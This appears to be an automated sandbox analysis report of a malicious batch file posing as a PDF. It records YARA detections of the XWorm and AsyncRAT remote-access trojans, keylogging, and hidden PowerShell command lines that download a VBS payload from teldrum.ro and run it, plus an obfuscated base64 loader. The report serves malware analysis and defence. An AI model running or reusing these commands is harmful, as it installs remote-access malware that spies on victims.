Source: powershell.exe, 0000001C.00000002.1894952447.0000022801A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2133873133.000002002C6C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/2HkMnPyb
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA84FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000002.00000002.1718064602.00000164D92D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1718064602.00000164D9EB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA85B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA85B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro//images/gh
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA85B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro//images/globalx1.jpg
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA85B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro//images/globalx1.jpg(
Source: powershell.exe, 00000002.00000002.1740974865.00000164F11C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro//images/globalx1.vbs
Source: powershell.exe, 00000002.00000002.1718064602.00000164D9EB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro//images/globalx1.vbs(
Source: powershell.exe, 00000002.00000002.1718064602.00000164D92D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1718064602.00000164D9EB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro//images/globalx1.vbsX
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA84FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA84FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA84FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA71F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA84FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA84F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA7250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA6FFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pastery.net
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA8207000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pastery.net/
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA6FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8207000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pastery.net/gvsgbu/raw/
Source: powershell.exe, 00000006.00000002.3636658679.0000024DB6990000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3636658679.0000024DB6A1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3764327102.0000024DB86F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pastery.net/jvfvkt/raw/
Source: powershell.exe, 00000007.00000002.1892193602.000001DCA6FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1892193602.000001DCA8207000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pastery.net/tvwmxe/raw/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49838 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Source: powershell.exe

Process created: 60

System Summary

Malicious sample detected (through community Yara rule)

Source: 64.2.powershell.exe.208006e8178.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 64.2.powershell.exe.208006e8178.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 49.2.powershell.exe.26c57b16cb8.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 49.2.powershell.exe.26c57b16cb8.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 45.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 45.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 57.2.powershell.exe.117de8f7d58.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 57.2.powershell.exe.117de8f7d58.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 41.2.powershell.exe.2002c7f3a58.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 41.2.powershell.exe.2002c7f3a58.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.powershell.exe.22801af67f0.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 28.2.powershell.exe.22801af67f0.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 49.2.powershell.exe.26c57b12b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 49.2.powershell.exe.26c57b12b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.powershell.exe.22801af2690.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 28.2.powershell.exe.22801af2690.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 64.2.powershell.exe.208006e4018.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 64.2.powershell.exe.208006e4018.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 57.2.powershell.exe.117de8f3be0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 57.2.powershell.exe.117de8f3be0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 41.2.powershell.exe.2002c7ef8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 41.2.powershell.exe.2002c7ef8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000029.00000002.2133873133.000002002C6C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000039.00000002.2339225011.00000117DE7E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000031.00000002.2238659527.0000026C579E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001C.00000002.1894952447.0000022801A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000031.00000002.2238659527.0000026C57CE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000002D.00000002.2121324006.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000040.00000002.2420990292.00000208005B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001C.00000002.1894952447.0000022801CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000029.00000002.2133873133.000002002C9C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000040.00000002.2420990292.00000208008B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2080, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2300, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7904, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Sample has a suspicious name (potential lure to open the executable)

Source: z1Documents_pdf_.bat

Static file information: Suspicious name

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA \| Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $hzjmp = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EAEQAIA' + [char]66 + 'EACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + '0AGUAbA' + [char]66 + 'kAHIAdQ' + [char]66 + 'tAC4Acg' + [char]66 + 'vAC8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAGcAbA' + [char]66 + 'vAGIAYQ' + [char]66 + 'sAHgAMQAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + '
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA \| Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $hzjmp = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EAEQAIA' + [char]66 + 'EACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + '0AGUAbA' + [char]66 + 'kAHIAdQ' + [char]66 + 'tAC4Acg' + [char]66 + 'vAC8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAGcAbA' + [char]66 + 'vAGIAYQ' + [char]66 + 'sAHgAMQAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 